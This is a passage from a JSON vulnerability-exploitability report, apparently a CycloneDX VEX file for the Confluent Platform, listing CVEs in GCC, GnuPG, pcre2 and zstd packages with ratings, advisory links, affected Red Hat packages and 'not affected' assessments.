          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        674
      ],
      "description": "libiberty/rust-demangle.c in GNU GCC 11.2 allows stack consumption in demangle_const, as demonstrated by nm-new.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2022-27943"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2022-27943"
        },
        {
          "url": "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=105039"
        },
        {
          "url": "https://gcc.gnu.org/git/gitweb.cgi?p=gcc.git;h=1a770b01ef415e114164b6151d1e55acdee09371"
        },
        {
          "url": "https://gcc.gnu.org/git/gitweb.cgi?p=gcc.git;h=9234cdca6ee88badfc00297e72f13dac4e540c79"
        },
        {
          "url": "https://gcc.gnu.org/git/gitweb.cgi?p=gcc.git;h=fc968115a742d9e4674d9725ce9c2106b91b6ead"
        },
        {
          "url": "https://gcc.gnu.org/pipermail/gcc-patches/2022-March/592244.html"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/H424YXGW7OKXS2NCAP35OP6Y4P4AW6VG/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-27943"
        },
        {
          "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=28995"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2022-27943"
        }
      ],
      "published": "2022-03-26T13:15:07+00:00",
      "updated": "2026-06-17T04:37:46+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "8.5.0-28.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "8.5.0-28.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2022-3219",
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.2,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        787
      ],
      "description": "GnuPG can be made to spin on a relatively small input by (for example) crafting a public key with thousands of signatures attached, compressed down to just a few KB.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2022-3219"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2022-3219"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2127010"
        },
        {
          "url": "https://dev.gnupg.org/D556"
        },
        {
          "url": "https://dev.gnupg.org/T5993"
        },
        {
          "url": "https://marc.info/?l=oss-security&m=165696590211434&w=4"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-3219"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20230324-0001/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2022-3219"
        }
      ],
      "published": "2023-02-23T20:15:12+00:00",
      "updated": "2026-06-17T04:59:05+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.2.20-4.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2022-41409",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        190
      ],
      "description": "Integer overflow vulnerability in pcre2test before 10.41 allows attackers to cause a denial of service or other unspecified impacts via negative input.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2022-41409"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2022-41409"
        },
        {
          "url": "https://github.com/PCRE2Project/pcre2/commit/94e1c001761373b7d9450768aa15d04c25547a35"
        },
        {
          "url": "https://github.com/PCRE2Project/pcre2/issues/141"
        },
        {
          "url": "https://github.com/advisories/GHSA-4qfx-v7wh-3q4j"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41409"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2022-41409"
        }
      ],
      "published": "2023-07-18T14:15:12+00:00",
      "updated": "2026-06-17T05:03:09+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/pcre2@10.32-3.el8_6?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "10.32-3.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/pcre2@10.32-3.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/pcre2@10.32-3.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/pcre2@10.32-3.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/pcre2@10.32-3.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/pcre2@10.32-3.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/pcre2@10.32-3.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/pcre2@10.32-3.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/pcre2@10.32-3.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/pcre2@10.32-3.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/pcre2@10.32-3.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/pcre2@10.32-3.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/pcre2@10.32-3.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/pcre2@10.32-3.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/pcre2@10.32-3.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/pcre2@10.32-3.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/pcre2@10.32-3.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/pcre2@10.32-3.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/pcre2@10.32-3.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/pcre2@10.32-3.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/pcre2@10.32-3.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/pcre2@10.32-3.el8_6?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2022-4899",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        400
      ],
      "description": "A vulnerability was found in zstd v1.4.10, where an attacker can supply empty string as an argument to the command line tool to cause buffer overrun.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2022-4899"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2024:0894"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2024:1141"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2022-4899"
        },
        {
          "url": "https://bugzilla.redhat.com/2179864"
        },
        {
          "url": "https://bugzilla.redhat.com/2188109"
        },
        {
          "url": "https://bugzilla.redhat.com/2188113"
        },
        {
          "url": "https://bugzilla.redhat.com/2188115"
        },
        {
          "url": "https://bugzilla.redhat.com/2188116"
        },
        {
          "url": "https://bugzilla.redhat.com/2188117"
        },
        {
          "url": "https://bugzilla.redhat.com/2188118"
        },
        {
          "url": "https://bugzilla.redhat.com/2188119"
        },
        {
          "url": "https://bugzilla.redhat.com/2188120"
        },
        {
          "url": "https://bugzilla.redhat.com/2188121"
        },
        {
          "url": "https://bugzilla.redhat.com/2188122"
        },
        {
          "url": "https://bugzilla.redhat.com/2188123"
        },
        {
          "url": "https://bugzilla.redhat.com/2188124"
        },
        {
          "url": "https://bugzilla.redhat.com/2188125"
        },
        {
          "url": "https://bugzilla.redhat.com/2188127"
        },
        {
          "url": "https://bugzilla.redhat.com/2188128"
        },
        {
          "url": "https://bugzilla.redhat.com/2188129"
        },
        {
          "url": "https://bugzilla.redhat.com/2188130"
        },
        {
          "url": "https://bugzilla.redhat.com/2188131"
        },
        {
          "url": "https://bugzilla.redhat.com/2188132"
        },
        {
          "url": "https://bugzilla.redhat.com/2224211"
        },
        {
          "url": "https://bugzilla.redhat.com/2224212"
        },
        {
          "url": "https://bugzilla.redhat.com/2224213"
        },
        {
          "url": "https://bugzilla.redhat.com/2224214"
        },
        {
          "url": "https://bugzilla.redhat.com/2224215"
        },
        {
          "url": "https://bugzilla.redhat.com/2224216"
        },
        {
          "url": "https://bugzilla.redhat.com/2224217"
        },
        {
          "url": "https://bugzilla.redhat.com/2224218"
        },
        {
          "url": "https://bugzilla.redhat.com/2224219"
        },
        {
          "url": "https://bugzilla.redhat.com/2224220"
        },
        {
          "url": "https://bugzilla.redhat.com/2224221"
        },
        {
          "url": "https://bugzilla.redhat.com/2224222"
        },
        {
          "url": "https://bugzilla.redhat.com/2245014"
        },
        {
          "url": "https://bugzilla.redhat.com/2245015"
        },
        {
          "url": "https://bugzilla.redhat.com/2245016"
        },
        {
          "url": "https://bugzilla.redhat.com/2245017"
        },
        {
          "url": "https://bugzilla.redhat.com/2245018"
        },
        {
          "url": "https://bugzilla.redhat.com/2245019"
        },
        {
          "url": "https://bugzilla.redhat.com/2245020"
        },
        {
          "url": "https://bugzilla.redhat.com/2245021"
        },
        {
          "url": "https://bugzilla.redhat.com/2245022"
        },
        {
          "url": "https://bugzilla.redhat.com/2245023"
        },
        {
          "url": "https://bugzilla.redhat.com/2245024"
        },
        {
          "url": "https://bugzilla.redhat.com/2245026"
        },
        {
          "url": "https://bugzilla.redhat.com/2245027"
        },
        {
          "url": "https://bugzilla.redhat.com/2245028"
        },
        {
          "url": "https://bugzilla.redhat.com/2245029"
        },
        {
          "url": "https://bugzilla.redhat.com/2245030"
        },
        {
          "url": "https://bugzilla.redhat.com/2245031"
        },
        {
          "url": "https://bugzilla.redhat.com/2245032"
        },
        {
          "url": "https://bugzilla.redhat.com/2245033"
        },
        {
          "url": "https://bugzilla.redhat.com/2245034"
        },
        {
          "url": "https://bugzilla.redhat.com/2258771"
        },
        {
          "url": "https://bugzilla.redhat.com/2258772"
        },
        {
          "url": "https://bugzilla.redhat.com/2258773"
        },
        {
          "url": "https://bugzilla.redhat.com/2258774"
        },
        {
          "url": "https://bugzilla.redhat.com/2258775"
        },
        {
          "url": "https://bugzilla.redhat.com/2258776"
        },
        {
          "url": "https://bugzilla.redhat.com/2258777"
        },
        {
          "url": "https://bugzilla.redhat.com/2258778"
        },
        {
          "url": "https://bugzilla.redhat.com/2258779"
        },
        {
          "url": "https://bugzilla.redhat.com/2258780"
        },
        {
          "url": "https://bugzilla.redhat.com/2258781"
        },
        {
          "url": "https://bugzilla.redhat.com/2258782"
        },
        {
          "url": "https://bugzilla.redhat.com/2258783"
        },
        {
          "url": "https://bugzilla.redhat.com/2258784"
        },
        {
          "url": "https://bugzilla.redhat.com/2258785"
        },
        {
          "url": "https://bugzilla.redhat.com/2258787"
        },
        {
          "url": "https://bugzilla.redhat.com/2258788"
        },
        {
          "url": "https://bugzilla.redhat.com/2258789"
        },
        {
          "url": "https://bugzilla.redhat.com/2258790"
        },
        {
          "url": "https://bugzilla.redhat.com/2258791"
        },
        {
          "url": "https://bugzilla.redhat.com/2258792"
        },
        {
          "url": "https://bugzilla.redhat.com/2258793"
        },
        {
          "url": "https://bugzilla.redhat.com/2258794"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2179864"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2188109"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2188113"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2188115"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2188116"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2188117"
        },
        {
